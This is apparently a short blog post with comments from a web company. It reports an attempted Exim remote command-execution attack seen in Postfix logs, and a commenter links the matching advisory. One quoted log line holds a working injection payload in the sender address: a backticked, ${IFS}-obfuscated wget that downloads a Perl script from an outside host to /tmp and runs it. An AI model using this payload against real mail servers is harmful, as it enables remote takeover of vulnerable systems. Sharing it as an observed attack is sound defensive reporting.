Pale Purple https://www.palepurple.co.uk Office Address Registered Office Blount House, Hall Court, Hall Park Way,,
Telford, Shropshire, TF3 4NQ GB
sales@palepurple.co.uk GB 884 6231 01
Aside from generally getting too much email, today this gem arrived ….
Presumably there is/was a vulnerability in Exim.
Thankfully this server runs Postfix.
Jun 18 23:47:47 xxxx postfix/cleanup[727]: 718FF848036: message-id=<>
Jun 18 23:47:47 xxxx postfix/qmgr[1444]: 718FF848036: from=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}radioactivefrog.com/.x/exim.txt“perl${IFS}/tmp/p.pl`@blaat.com>, size=206, nrcpt=1 (queue active)
‹ Two Factor Authentication for remote SSH users (using google authenticator) Full text searching with solr ›
we got four of them at 2351 last night; the advisory is at https://www.redteam-pentesting.de/en/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution
Ah hah! thank you!